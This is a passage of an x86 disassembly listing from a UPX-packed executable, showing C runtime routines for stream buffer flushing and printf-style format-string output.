movzx eax, word ptr [ebp+arg_0+2]
loc_41F585: ; CODE XREF: sub_41F515+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_41F515 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F58A proc near ; CODE XREF: sub_41B886+46�p
; sub_41B980+45�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [esi+0Ch]
mov ebx, [esi+10h]
test al, 82h
jz loc_41F693
test al, 40h
jnz loc_41F693
test al, 1
jz short loc_41F5C2
and dword ptr [esi+4], 0
test al, 10h
jz loc_41F693
mov ecx, [esi+8]
and al, 0FEh
mov [esi], ecx
mov [esi+0Ch], eax
loc_41F5C2: ; CODE XREF: sub_41F58A+20�j
mov eax, [esi+0Ch]
and dword ptr [esi+4], 0
and [ebp+arg_4], 0
and al, 0EFh
or al, 2
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_41F5FC
cmp esi, offset dword_43D0E8
jz short loc_41F5EA
cmp esi, offset dword_43D108
jnz short loc_41F5F5
loc_41F5EA: ; CODE XREF: sub_41F58A+56�j
push ebx
call sub_423E35
test eax, eax
pop ecx
jnz short loc_41F5FC
loc_41F5F5: ; CODE XREF: sub_41F58A+5E�j
push esi
call sub_4239EF
pop ecx
loc_41F5FC: ; CODE XREF: sub_41F58A+4E�j
; sub_41F58A+69�j
test word ptr [esi+0Ch], 108h
push edi
jz short loc_41F669
mov eax, [esi+8]
mov edi, [esi]
sub edi, eax
lea ecx, [eax+1]
mov [esi], ecx
mov ecx, [esi+18h]
dec ecx
test edi, edi
mov [esi+4], ecx
jle short loc_41F62C
push edi
push eax
push ebx
call sub_42291D
add esp, 0Ch
mov [ebp+arg_4], eax
jmp short loc_41F65F
; ---------------------------------------------------------------------------
loc_41F62C: ; CODE XREF: sub_41F58A+90�j
cmp ebx, 0FFFFFFFFh
jz short loc_41F647
mov eax, ebx
mov ecx, ebx
sar eax, 5
and ecx, 1Fh
mov eax, ds:dword_4DCCA0[eax*4]
lea eax, [eax+ecx*8]
jmp short loc_41F64C
; ---------------------------------------------------------------------------
loc_41F647: ; CODE XREF: sub_41F58A+A5�j
mov eax, offset dword_43D030
loc_41F64C: ; CODE XREF: sub_41F58A+BB�j
test byte ptr [eax+4], 20h
jz short loc_41F65F
push 2
push 0
push ebx
call sub_42272B
add esp, 0Ch
loc_41F65F: ; CODE XREF: sub_41F58A+A0�j
; sub_41F58A+C6�j
mov eax, [esi+8]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
jmp short loc_41F67D
; ---------------------------------------------------------------------------
loc_41F669: ; CODE XREF: sub_41F58A+79�j
push 1
lea eax, [ebp+arg_0]
pop edi
push edi
push eax
push ebx
call sub_42291D
add esp, 0Ch
mov [ebp+arg_4], eax
loc_41F67D: ; CODE XREF: sub_41F58A+DD�j
cmp [ebp+arg_4], edi
pop edi
jz short loc_41F689
or dword ptr [esi+0Ch], 20h
jmp short loc_41F698
; ---------------------------------------------------------------------------
loc_41F689: ; CODE XREF: sub_41F58A+F7�j
mov eax, [ebp+arg_0]
and eax, 0FFh
jmp short loc_41F69B
; ---------------------------------------------------------------------------
loc_41F693: ; CODE XREF: sub_41F58A+10�j
; sub_41F58A+18�j ...
or al, 20h
mov [esi+0Ch], eax
loc_41F698: ; CODE XREF: sub_41F58A+FD�j
or eax, 0FFFFFFFFh
loc_41F69B: ; CODE XREF: sub_41F58A+107�j
pop esi
pop ebx
pop ebp
retn
sub_41F58A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F69F proc near ; CODE XREF: sub_41B886+29�p
; sub_41B980+28�p ...
var_248 = byte ptr -248h
var_247 = byte ptr -247h
var_49 = byte ptr -49h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 248h
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
mov bl, [edi]
inc edi
test bl, bl
mov [ebp+var_C], esi
mov [ebp+var_14], esi
mov [ebp+arg_4], edi
jz loc_41FDB8
mov ecx, [ebp+var_10]
xor edx, edx
jmp short loc_41F6D3
; ---------------------------------------------------------------------------
loc_41F6CB: ; CODE XREF: sub_41F69F+713�j
mov ecx, [ebp+var_10]
mov esi, [ebp+var_30]
xor edx, edx
loc_41F6D3: ; CODE XREF: sub_41F69F+2A�j
cmp [ebp+var_14], edx
jl loc_41FDB8
cmp bl, 20h
jl short loc_41F6F4
cmp bl, 78h
jg short loc_41F6F4
movsx eax, bl
mov al, [eax+427734h]
and eax, 0Fh
jmp short loc_41F6F6
; ---------------------------------------------------------------------------
loc_41F6F4: ; CODE XREF: sub_41F69F+40�j
; sub_41F69F+45�j
xor eax, eax
loc_41F6F6: ; CODE XREF: sub_41F69F+53�j
movsx eax, byte_427754[esi+eax*8]
sar eax, 4
cmp eax, 7 ; switch 8 cases
mov [ebp+var_30], eax
ja loc_41FDA7 ; default
jmp off_41FDC0[eax*4] ; switch jump
loc_41F714: ; DATA XREF: UPX0:off_41FDC0�o
or [ebp+var_10], 0FFFFFFFFh ; jumptable 0041F70D case 1
mov [ebp+var_34], edx
mov [ebp+var_28], edx
mov [ebp+var_20], edx
mov [ebp+var_1C], edx
mov [ebp+var_4], edx
mov [ebp+var_24], edx
jmp loc_41FDA7 ; default
; ---------------------------------------------------------------------------
loc_41F72F: ; CODE XREF: sub_41F69F+6E�j
; DATA XREF: UPX0:off_41FDC0�o
movsx eax, bl ; jumptable 0041F70D case 2
sub eax, 20h
jz short loc_41F772
sub eax, 3
jz short loc_41F769
sub eax, 8
jz short loc_41F760
dec eax
dec eax
jz short loc_41F757
sub eax, 3
jnz loc_41FDA7 ; default
or [ebp+var_4], 8
jmp loc_41FDA7 ; default
; ---------------------------------------------------------------------------
loc_41F757: ; CODE XREF: sub_41F69F+A4�j
or [ebp+var_4], 4
jmp loc_41FDA7 ; default
; ---------------------------------------------------------------------------
loc_41F760: ; CODE XREF: sub_41F69F+A0�j
or [ebp+var_4], 1
jmp loc_41FDA7 ; default
; ---------------------------------------------------------------------------
loc_41F769: ; CODE XREF: sub_41F69F+9B�j
or byte ptr [ebp+var_4], 80h
jmp loc_41FDA7 ; default
; ---------------------------------------------------------------------------
loc_41F772: ; CODE XREF: sub_41F69F+96�j
or [ebp+var_4], 2
jmp loc_41FDA7 ; default
; ---------------------------------------------------------------------------
loc_41F77B: ; CODE XREF: sub_41F69F+6E�j
; DATA XREF: UPX0:off_41FDC0�o
cmp bl, 2Ah ; jumptable 0041F70D case 3
jnz short loc_41F7A3
lea eax, [ebp+arg_8]
push eax
call sub_41FE7E
test eax, eax
pop ecx
mov [ebp+var_20], eax
jge loc_41FDA7 ; default
or [ebp+var_4], 4
neg eax
loc_41F79B: ; CODE XREF: sub_41F69F+111�j
mov [ebp+var_20], eax
jmp loc_41FDA7 ; default
; ---------------------------------------------------------------------------
loc_41F7A3: ; CODE XREF: sub_41F69F+DF�j
mov eax, [ebp+var_20]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
jmp short loc_41F79B
; ---------------------------------------------------------------------------
loc_41F7B2: ; CODE XREF: sub_41F69F+6E�j
; DATA XREF: UPX0:off_41FDC0�o
mov [ebp+var_10], edx ; jumptable 0041F70D case 4
jmp loc_41FDA7 ; default
; ---------------------------------------------------------------------------
loc_41F7BA: ; CODE XREF: sub_41F69F+6E�j
; DATA XREF: UPX0:off_41FDC0�o
cmp bl, 2Ah ; jumptable 0041F70D case 5
jnz short loc_41F7DD
lea eax, [ebp+arg_8]
push eax
call sub_41FE7E
test eax, eax
pop ecx
mov [ebp+var_10], eax
jge loc_41FDA7 ; default
or [ebp+var_10], 0FFFFFFFFh
jmp loc_41FDA7 ; default
; ---------------------------------------------------------------------------
loc_41F7DD: ; CODE XREF: sub_41F69F+11E�j
lea eax, [ecx+ecx*4]
movsx ecx, bl
lea eax, [ecx+eax*2-30h]
mov [ebp+var_10], eax
jmp loc_41FDA7 ; default
; ---------------------------------------------------------------------------
loc_41F7EF: ; CODE XREF: sub_41F69F+6E�j
; DATA XREF: UPX0:off_41FDC0�o
cmp bl, 49h ; jumptable 0041F70D case 6
jz short loc_41F822
cmp bl, 68h
jz short loc_41F819
cmp bl, 6Ch
jz short loc_41F810
cmp bl, 77h
jnz loc_41FDA7 ; default
or byte ptr [ebp+var_4+1], 8
jmp loc_41FDA7 ; default
; ---------------------------------------------------------------------------
loc_41F810: ; CODE XREF: sub_41F69F+15D�j
or [ebp+var_4], 10h
jmp loc_41FDA7 ; default
; ---------------------------------------------------------------------------
loc_41F819: ; CODE XREF: sub_41F69F+158�j
or [ebp+var_4], 20h
jmp loc_41FDA7 ; default
; ---------------------------------------------------------------------------
loc_41F822: ; CODE XREF: sub_41F69F+153�j
cmp byte ptr [edi], 36h
jnz short loc_41F83B
cmp byte ptr [edi+1], 34h
jnz short loc_41F83B
inc edi
inc edi
or byte ptr [ebp+var_4+1], 80h
mov [ebp+arg_4], edi
jmp loc_41FDA7 ; default
; ---------------------------------------------------------------------------
loc_41F83B: ; CODE XREF: sub_41F69F+186�j
; sub_41F69F+18C�j
mov [ebp+var_30], edx
loc_41F83E: ; CODE XREF: sub_41F69F+6E�j
; DATA XREF: UPX0:off_41FDC0�o
mov ecx, off_43C9D8 ; jumptable 0041F70D case 0
mov [ebp+var_24], edx
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41F86A
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
movsx eax, bl
push eax
call sub_41FDE0
mov bl, [edi]
add esp, 0Ch
inc edi
mov [ebp+arg_4], edi
loc_41F86A: ; CODE XREF: sub_41F69F+1B0�j
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
movsx eax, bl
push eax
call sub_41FDE0
add esp, 0Ch
jmp loc_41FDA7 ; default
; ---------------------------------------------------------------------------
loc_41F882: ; CODE XREF: sub_41F69F+6E�j
; DATA XREF: UPX0:off_41FDC0�o
movsx eax, bl ; jumptable 0041F70D case 7
cmp eax, 67h
jg loc_41FAAA
cmp eax, 65h
jge loc_41F92D
cmp eax, 58h
jg loc_41F98B
jz loc_41FB1E
sub eax, 43h
jz loc_41F94E
dec eax
dec eax
jz short loc_41F923
dec eax
dec eax
jz short loc_41F923
sub eax, 0Ch
jnz loc_41FCA9
test word ptr [ebp+var_4], 830h
jnz short loc_41F8CC
or byte ptr [ebp+var_4+1], 8
loc_41F8CC: ; CODE XREF: sub_41F69F+227�j
; sub_41F69F+42A�j
mov esi, [ebp+var_10]
cmp esi, 0FFFFFFFFh
jnz short loc_41F8D9
mov esi, 7FFFFFFFh
loc_41F8D9: ; CODE XREF: sub_41F69F+233�j
lea eax, [ebp+arg_8]
push eax
call sub_41FE7E
test word ptr [ebp+var_4], 810h
pop ecx
mov ecx, eax
mov [ebp+var_8], ecx
jz loc_41FAF2
test ecx, ecx
jnz short loc_41F901
mov ecx, off_43CBF4
mov [ebp+var_8], ecx
loc_41F901: ; CODE XREF: sub_41F69F+257�j
mov [ebp+var_24], 1
mov eax, ecx
loc_41F90A: ; CODE XREF: sub_41F69F+282�j
mov edx, esi
dec esi
test edx, edx
jz loc_41FAE9
cmp word ptr [eax], 0
jz loc_41FAE9
inc eax
inc eax
jmp short loc_41F90A
; ---------------------------------------------------------------------------
loc_41F923: ; CODE XREF: sub_41F69F+212�j
; sub_41F69F+216�j
mov [ebp+var_34], 1
add bl, 20h
loc_41F92D: ; CODE XREF: sub_41F69F+1F2�j
or [ebp+var_4], 40h
lea edi, [ebp+var_248]
cmp ecx, edx
mov [ebp+var_8], edi
jge loc_41FA11
mov [ebp+var_10], 6
jmp loc_41FA1F
; ---------------------------------------------------------------------------
loc_41F94E: ; CODE XREF: sub_41F69F+20A�j
test word ptr [ebp+var_4], 830h
jnz short loc_41F95A
or byte ptr [ebp+var_4+1], 8
loc_41F95A: ; CODE XREF: sub_41F69F+2B5�j
; sub_41F69F+2F4�j
test word ptr [ebp+var_4], 810h
lea eax, [ebp+arg_8]
push eax
jz short loc_41F9A1
call sub_41FE9B
push eax
lea eax, [ebp+var_248]
push eax
call sub_423E5B
add esp, 0Ch
mov [ebp+var_C], eax
test eax, eax
jge short loc_41F9B4
mov [ebp+var_28], 1
jmp short loc_41F9B4
; ---------------------------------------------------------------------------
loc_41F98B: ; CODE XREF: sub_41F69F+1FB�j
sub eax, 5Ah
jz short loc_41F9C2
sub eax, 9
jz short loc_41F95A
dec eax
jz loc_41FB84
jmp loc_41FCA9
; ---------------------------------------------------------------------------
loc_41F9A1: ; CODE XREF: sub_41F69F+2C5�j
call sub_41FE7E
pop ecx
mov [ebp+var_248], al
mov [ebp+var_C], 1
loc_41F9B4: ; CODE XREF: sub_41F69F+2E1�j
; sub_41F69F+2EA�j
lea eax, [ebp+var_248]
mov [ebp+var_8], eax
jmp loc_41FCA9
; ---------------------------------------------------------------------------
loc_41F9C2: ; CODE XREF: sub_41F69F+2EF�j
lea eax, [ebp+arg_8]
push eax
call sub_41FE7E
test eax, eax
pop ecx
jz short loc_41FA03
mov ecx, [eax+4]
test ecx, ecx
jz short loc_41FA03
test byte ptr [ebp+var_4+1], 8
jz short loc_41F9F4
movsx eax, word ptr [eax]
shr eax, 1
mov [ebp+var_8], ecx
mov [ebp+var_C], eax
mov [ebp+var_24], 1
jmp loc_41FCA9
; ---------------------------------------------------------------------------
loc_41F9F4: ; CODE XREF: sub_41F69F+33C�j
and [ebp+var_24], 0
mov [ebp+var_8], ecx
movsx eax, word ptr [eax]
jmp loc_41FCA6
; ---------------------------------------------------------------------------
loc_41FA03: ; CODE XREF: sub_41F69F+32F�j
; sub_41F69F+336�j
mov eax, off_43CBF0
mov [ebp+var_8], eax
push eax
jmp loc_41FA9F
; ---------------------------------------------------------------------------
loc_41FA11: ; CODE XREF: sub_41F69F+29D�j
jnz short loc_41FA1F
cmp bl, 67h
jnz short loc_41FA1F
mov [ebp+var_10], 1
loc_41FA1F: ; CODE XREF: sub_41F69F+2AA�j
; sub_41F69F:loc_41FA11�j ...
mov eax, [ebp+arg_8]
push [ebp+var_34]
add eax, 8
mov [ebp+arg_8], eax
push [ebp+var_10]
mov ecx, [eax-8]
mov [ebp+var_48], ecx
mov eax, [eax-4]
mov [ebp+var_44], eax
movsx eax, bl
push eax
lea eax, [ebp+var_248]
push eax
lea eax, [ebp+var_48]
push eax
call off_43CF80
mov esi, [ebp+var_4]
add esp, 14h
and esi, 80h
jz short loc_41FA71
cmp [ebp+var_10], 0
jnz short loc_41FA71
lea eax, [ebp+var_248]
push eax
call off_43CF8C
pop ecx
loc_41FA71: ; CODE XREF: sub_41F69F+3BC�j
; sub_41F69F+3C2�j
cmp bl, 67h
jnz short loc_41FA88
test esi, esi
jnz short loc_41FA88
lea eax, [ebp+var_248]
push eax
call off_43CF84
pop ecx
loc_41FA88: ; CODE XREF: sub_41F69F+3D5�j
; sub_41F69F+3D9�j
cmp [ebp+var_248], 2Dh
jnz short loc_41FA9E
or byte ptr [ebp+var_4+1], 1
lea edi, [ebp+var_247]
mov [ebp+var_8], edi
loc_41FA9E: ; CODE XREF: sub_41F69F+3F0�j
push edi
loc_41FA9F: ; CODE XREF: sub_41F69F+36D�j
call sub_41AFE0
pop ecx
jmp loc_41FCA6
; ---------------------------------------------------------------------------
loc_41FAAA: ; CODE XREF: sub_41F69F+1E9�j
sub eax, 69h
jz loc_41FB84
sub eax, 5
jz loc_41FB5A
dec eax
jz loc_41FB47
dec eax
jz short loc_41FB17
sub eax, 3
jz loc_41F8CC
dec eax
dec eax
jz loc_41FB88
sub eax, 3
jnz loc_41FCA9
mov [ebp+var_2C], 27h
jmp short loc_41FB25
; ---------------------------------------------------------------------------
loc_41FAE9: ; CODE XREF: sub_41F69F+270�j
; sub_41F69F+27A�j
sub eax, ecx
sar eax, 1
jmp loc_41FCA6
; ---------------------------------------------------------------------------
loc_41FAF2: ; CODE XREF: sub_41F69F+24F�j
test ecx, ecx
jnz short loc_41FAFF
mov ecx, off_43CBF0
mov [ebp+var_8], ecx
loc_41FAFF: ; CODE XREF: sub_41F69F+455�j
mov eax, ecx
loc_41FB01: ; CODE XREF: sub_41F69F+46F�j
mov edx, esi
dec esi
test edx, edx
jz short loc_41FB10
cmp byte ptr [eax], 0
jz short loc_41FB10
inc eax
jmp short loc_41FB01
; ---------------------------------------------------------------------------
loc_41FB10: ; CODE XREF: sub_41F69F+467�j
; sub_41F69F+46C�j
sub eax, ecx
jmp loc_41FCA6
; ---------------------------------------------------------------------------
loc_41FB17: ; CODE XREF: sub_41F69F+425�j
mov [ebp+var_10], 8
loc_41FB1E: ; CODE XREF: sub_41F69F+201�j
mov [ebp+var_2C], 7
loc_41FB25: ; CODE XREF: sub_41F69F+448�j
test byte ptr [ebp+var_4], 80h
mov [ebp+var_C], 10h
jz short loc_41FB8F
mov al, byte ptr [ebp+var_2C]
mov [ebp+var_16], 30h
add al, 51h
mov [ebp+var_1C], 2
mov [ebp+var_15], al
jmp short loc_41FB8F
; ---------------------------------------------------------------------------
loc_41FB47: ; CODE XREF: sub_41F69F+41E�j
test byte ptr [ebp+var_4], 80h
mov [ebp+var_C], 8
jz short loc_41FB8F
or byte ptr [ebp+var_4+1], 2
jmp short loc_41FB8F
; ---------------------------------------------------------------------------
loc_41FB5A: ; CODE XREF: sub_41F69F+417�j
lea eax, [ebp+arg_8]
push eax
call sub_41FE7E
test byte ptr [ebp+var_4], 20h
pop ecx
jz short loc_41FB73
mov cx, word ptr [ebp+var_14]
mov [eax], cx
jmp short loc_41FB78
; ---------------------------------------------------------------------------
loc_41FB73: ; CODE XREF: sub_41F69F+4C9�j
mov ecx, [ebp+var_14]
mov [eax], ecx
loc_41FB78: ; CODE XREF: sub_41F69F+4D2�j
mov [ebp+var_28], 1
jmp loc_41FDA7 ; default
; ---------------------------------------------------------------------------
loc_41FB84: ; CODE XREF: sub_41F69F+2F7�j
; sub_41F69F+40E�j
or [ebp+var_4], 40h
loc_41FB88: ; CODE XREF: sub_41F69F+432�j
mov [ebp+var_C], 0Ah
loc_41FB8F: ; CODE XREF: sub_41F69F+491�j
; sub_41F69F+4A6�j ...
test byte ptr [ebp+var_4+1], 80h
jz short loc_41FBA1
lea eax, [ebp+arg_8]
push eax
call sub_41FE8B
pop ecx
jmp short loc_41FBE2
; ---------------------------------------------------------------------------
loc_41FBA1: ; CODE XREF: sub_41F69F+4F4�j
test byte ptr [ebp+var_4], 20h
jz short loc_41FBC8
test byte ptr [ebp+var_4], 40h
lea eax, [ebp+arg_8]
push eax
jz short loc_41FBBD
call sub_41FE7E
pop ecx
movsx eax, ax
loc_41FBBA: ; CODE XREF: sub_41F69F+527�j
; sub_41F69F+539�j
cdq
jmp short loc_41FBE2
; ---------------------------------------------------------------------------
loc_41FBBD: ; CODE XREF: sub_41F69F+510�j
call sub_41FE7E
pop ecx
movzx eax, ax
jmp short loc_41FBBA
; ---------------------------------------------------------------------------
loc_41FBC8: ; CODE XREF: sub_41F69F+506�j
test byte ptr [ebp+var_4], 40h
lea eax, [ebp+arg_8]
push eax
jz short loc_41FBDA
call sub_41FE7E
pop ecx
jmp short loc_41FBBA
; ---------------------------------------------------------------------------
loc_41FBDA: ; CODE XREF: sub_41F69F+531�j
call sub_41FE7E
pop ecx
xor edx, edx
loc_41FBE2: ; CODE XREF: sub_41F69F+500�j
; sub_41F69F+51C�j
test byte ptr [ebp+var_4], 40h
jz short loc_41FC03
test edx, edx
jg short loc_41FC03
jl short loc_41FBF2
test eax, eax
jnb short loc_41FC03
loc_41FBF2: ; CODE XREF: sub_41F69F+54D�j
neg eax
adc edx, 0
mov esi, eax
neg edx
or byte ptr [ebp+var_4+1], 1
mov edi, edx
jmp short loc_41FC07
; ---------------------------------------------------------------------------
loc_41FC03: ; CODE XREF: sub_41F69F+547�j
; sub_41F69F+54B�j ...
mov esi, eax
mov edi, edx
loc_41FC07: ; CODE XREF: sub_41F69F+562�j
test byte ptr [ebp+var_4+1], 80h
jnz short loc_41FC10
and edi, 0
loc_41FC10: ; CODE XREF: sub_41F69F+56C�j
cmp [ebp+var_10], 0
jge short loc_41FC1F
mov [ebp+var_10], 1
jmp short loc_41FC23
; ---------------------------------------------------------------------------
loc_41FC1F: ; CODE XREF: sub_41F69F+575�j
and [ebp+var_4], 0FFFFFFF7h
loc_41FC23: ; CODE XREF: sub_41F69F+57E�j
mov eax, esi
or eax, edi
jnz short loc_41FC2D
and [ebp+var_1C], 0
loc_41FC2D: ; CODE XREF: sub_41F69F+588�j
lea eax, [ebp+var_49]
mov [ebp+var_8], eax
loc_41FC33: ; CODE XREF: sub_41F69F+5DD�j
mov eax, [ebp+var_10]
dec [ebp+var_10]
test eax, eax
jg short loc_41FC43
mov eax, esi
or eax, edi
jz short loc_41FC7E
loc_41FC43: ; CODE XREF: sub_41F69F+59C�j
mov eax, [ebp+var_C]
cdq
push edx
push eax
push edi
push esi
mov [ebp+var_40], eax
mov [ebp+var_3C], edx
call sub_41D480
push [ebp+var_3C]
mov ebx, eax
add ebx, 30h
push [ebp+var_40]
push edi
push esi
call sub_41D410
cmp ebx, 39h
mov esi, eax
mov edi, edx
jle short loc_41FC74
add ebx, [ebp+var_2C]
loc_41FC74: ; CODE XREF: sub_41F69F+5D0�j
mov eax, [ebp+var_8]
dec [ebp+var_8]
mov [eax], bl
jmp short loc_41FC33
; ---------------------------------------------------------------------------
loc_41FC7E: ; CODE XREF: sub_41F69F+5A2�j
lea eax, [ebp+var_49]
sub eax, [ebp+var_8]
inc [ebp+var_8]
test byte ptr [ebp+var_4+1], 2
mov [ebp+var_C], eax
jz short loc_41FCA9
mov ecx, [ebp+var_8]
cmp byte ptr [ecx], 30h
jnz short loc_41FC9C
test eax, eax
jnz short loc_41FCA9
loc_41FC9C: ; CODE XREF: sub_41F69F+5F7�j
dec [ebp+var_8]
inc eax
mov ecx, [ebp+var_8]
mov byte ptr [ecx], 30h
loc_41FCA6: ; CODE XREF: sub_41F69F+35F�j
; sub_41F69F+406�j ...
mov [ebp+var_C], eax
loc_41FCA9: ; CODE XREF: sub_41F69F+21B�j
; sub_41F69F+2FD�j ...
cmp [ebp+var_28], 0
jnz loc_41FDA7 ; default
mov ebx, [ebp+var_4]
test bl, 40h
jz short loc_41FCE1
test bh, 1
jz short loc_41FCC6
mov [ebp+var_16], 2Dh
jmp short loc_41FCDA
; ---------------------------------------------------------------------------
loc_41FCC6: ; CODE XREF: sub_41F69F+61F�j
test bl, 1
jz short loc_41FCD1
mov [ebp+var_16], 2Bh
jmp short loc_41FCDA
; ---------------------------------------------------------------------------
loc_41FCD1: ; CODE XREF: sub_41F69F+62A�j
test bl, 2
jz short loc_41FCE1
mov [ebp+var_16], 20h
loc_41FCDA: ; CODE XREF: sub_41F69F+625�j
; sub_41F69F+630�j
mov [ebp+var_1C], 1
loc_41FCE1: ; CODE XREF: sub_41F69F+61A�j
; sub_41F69F+635�j
mov esi, [ebp+var_20]
sub esi, [ebp+var_1C]
sub esi, [ebp+var_C]
test bl, 0Ch
jnz short loc_41FD01
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 20h
call sub_41FE15
add esp, 10h
loc_41FD01: ; CODE XREF: sub_41F69F+64E�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_16]
push [ebp+arg_0]
push [ebp+var_1C]
push eax
call sub_41FE46
add esp, 10h
test bl, 8
jz short loc_41FD33
test bl, 4
jnz short loc_41FD33
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 30h
call sub_41FE15
add esp, 10h
loc_41FD33: ; CODE XREF: sub_41F69F+67B�j
; sub_41F69F+680�j
cmp [ebp+var_24], 0
jz short loc_41FD7A
cmp [ebp+var_C], 0
jle short loc_41FD7A
mov eax, [ebp+var_C]
mov ebx, [ebp+var_8]
lea edi, [eax-1]
loc_41FD48: ; CODE XREF: sub_41F69F+6D7�j
mov ax, [ebx]
inc ebx
push eax
lea eax, [ebp+var_38]
push eax
inc ebx
call sub_423E5B
pop ecx
test eax, eax
pop ecx
jle short loc_41FD8F
lea ecx, [ebp+var_14]
push ecx
push [ebp+arg_0]
push eax
lea eax, [ebp+var_38]
push eax
call sub_41FE46
add esp, 10h
mov eax, edi
dec edi
test eax, eax
jnz short loc_41FD48
jmp short loc_41FD8F
; ---------------------------------------------------------------------------
loc_41FD7A: ; CODE XREF: sub_41F69F+698�j
; sub_41F69F+69E�j
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push [ebp+var_C]
push [ebp+var_8]
call sub_41FE46
add esp, 10h
loc_41FD8F: ; CODE XREF: sub_41F69F+6BC�j
; sub_41F69F+6D9�j
test byte ptr [ebp+var_4], 4
jz short loc_41FDA7 ; default
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 20h
call sub_41FE15
add esp, 10h
loc_41FDA7: ; CODE XREF: sub_41F69F+68�j
; sub_41F69F+8B�j ...
mov edi, [ebp+arg_4] ; default
mov bl, [edi]
inc edi
test bl, bl
mov [ebp+arg_4], edi
jnz loc_41F6CB
loc_41FDB8: ; CODE XREF: sub_41F69F+1F�j
; sub_41F69F+37�j
mov eax, [ebp+var_14]
pop edi
pop esi
pop ebx
leave
retn
sub_41F69F endp
; ---------------------------------------------------------------------------
off_41FDC0 dd offset loc_41F83E ; DATA XREF: sub_41F69F+6E�r
dd offset loc_41F714 ; jump table for switch statement
dd offset loc_41F72F
dd offset loc_41F77B
dd offset loc_41F7B2
dd offset loc_41F7BA
dd offset loc_41F7EF
dd offset loc_41F882
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FDE0 proc near ; CODE XREF: sub_41F69F+1BD�p
; sub_41F69F+1D6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
dec dword ptr [ecx+4]
js short loc_41FDF9
mov edx, [ecx]
mov al, byte ptr [ebp+arg_0]
mov [edx], al
inc dword ptr [ecx]
movzx eax, al
jmp short loc_41FE04
; ---------------------------------------------------------------------------
loc_41FDF9: ; CODE XREF: sub_41FDE0+9�j
push ecx
push [ebp+arg_0]
call sub_41F58A
pop ecx
pop ecx
loc_41FE04: ; CODE XREF: sub_41FDE0+17�j
cmp eax, 0FFFFFFFFh
mov eax, [ebp+arg_8]
jnz short loc_41FE11
or dword ptr [eax], 0FFFFFFFFh
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41FE11: ; CODE XREF: sub_41FDE0+2A�j
inc dword ptr [eax]
pop ebp
retn
sub_41FDE0 endp
; =============== S U B R O U T I N E =======================================
sub_41FE15 proc near ; CODE XREF: sub_41F69F+65A�p
; sub_41F69F+68C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
push edi
mov edi, [esp+8+arg_4]
mov eax, edi
dec edi
test eax, eax
jle short loc_41FE43
mov esi, [esp+8+arg_C]
loc_41FE26: ; CODE XREF: sub_41FE15+2C�j
push esi
push [esp+0Ch+arg_8]
push [esp+10h+arg_0]
call sub_41FDE0
add esp, 0Ch
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_41FE43
mov eax, edi
dec edi
test eax, eax
jg short loc_41FE26
loc_41FE43: ; CODE XREF: sub_41FE15+B�j
; sub_41FE15+25�j
pop edi
pop esi
retn
sub_41FE15 endp
; =============== S U B R O U T I N E =======================================
sub_41FE46 proc near ; CODE XREF: sub_41F69F+670�p
; sub_41F69F+6CA�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov ebx, [esp+4+arg_4]
mov eax, ebx
dec ebx
push esi
push edi
test eax, eax
jle short loc_41FE7A
mov edi, [esp+0Ch+arg_C]
mov esi, [esp+0Ch+arg_0]
loc_41FE5C: ; CODE XREF: sub_41FE46+32�j
movsx eax, byte ptr [esi]
push edi
inc esi
push [esp+10h+arg_8]
push eax
call sub_41FDE0
add esp, 0Ch
cmp dword ptr [edi], 0FFFFFFFFh
jz short loc_41FE7A
mov eax, ebx
dec ebx
test eax, eax
jg short loc_41FE5C
loc_41FE7A: ; CODE XREF: sub_41FE46+C�j
; sub_41FE46+2B�j
pop edi
pop esi
pop ebx
retn
sub_41FE46 endp
; =============== S U B R O U T I N E =======================================
sub_41FE7E proc near ; CODE XREF: sub_41F69F+E5�p
; sub_41F69F+124�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 4
mov eax, [eax]
mov eax, [eax-4]
retn
sub_41FE7E endp
; =============== S U B R O U T I N E =======================================
sub_41FE8B proc near ; CODE XREF: sub_41F69F+4FA�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 8
mov ecx, [eax]
mov eax, [ecx-8]
mov edx, [ecx-4]
retn
sub_41FE8B endp
; =============== S U B R O U T I N E =======================================
sub_41FE9B proc near ; CODE XREF: sub_41F69F+2C7�p
